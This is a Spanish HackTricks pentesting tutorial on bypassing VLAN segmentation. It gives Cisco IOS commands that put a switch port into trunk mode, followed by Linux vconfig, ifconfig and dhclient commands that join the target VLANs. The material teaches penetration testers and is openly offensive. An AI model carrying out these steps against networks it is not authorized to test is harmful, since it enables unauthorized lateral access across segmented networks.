Lateral VLAN Segmentation Bypass

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Si se tiene acceso directo a un switch, se puede eludir la segmentación de VLAN. Esto implica reconfigurar el puerto conectado a modo trunk, establecer interfaces virtuales para las VLANs objetivo y configurar direcciones IP, ya sea de forma dinámica (DHCP) o estática, dependiendo del escenario (para más detalles consulta https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Inicialmente, se requiere la identificación del puerto conectado específico. Esto se puede lograr típicamente a través de mensajes CDP, o buscando el puerto mediante la máscara include.

Si CDP no está operativo, se puede intentar la identificación del puerto buscando la dirección MAC:

SW1(config)# show mac address-table | include 0050.0000.0500

Antes de cambiar al modo trunk, se debe compilar una lista de VLANs existentes y determinar sus identificadores. Estos identificadores se asignan a la interfaz, lo que permite el acceso a varias VLANs a través del trunk. El puerto en uso, por ejemplo, está asociado con la VLAN 10.

SW1# show vlan brief

La transición al modo trunk implica ingresar al modo de configuración de la interfaz:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

Cambiar a modo trunk interrumpirá temporalmente la conectividad, pero esto se puede restaurar posteriormente.

Luego se crean interfaces virtuales, se asignan IDs de VLAN y se activan:

sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

A continuación, se realiza una solicitud de dirección a través de DHCP. Alternativamente, en casos donde DHCP no es viable, las direcciones se pueden configurar manualmente:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Ejemplo de configuración manual de una dirección IP estática en una interfaz (VLAN 10):

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

La conectividad se prueba iniciando solicitudes ICMP a las puertas de enlace predeterminadas para las VLANs 10, 20, 50 y 60.

En última instancia, este proceso permite eludir la segmentación de VLAN, facilitando así el acceso sin restricciones a cualquier red VLAN y preparando el escenario para acciones posteriores.

Referencias

https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousIDS and IPS Evasion NextNetwork Protocols Explained (ESP)

Last updated 4 months ago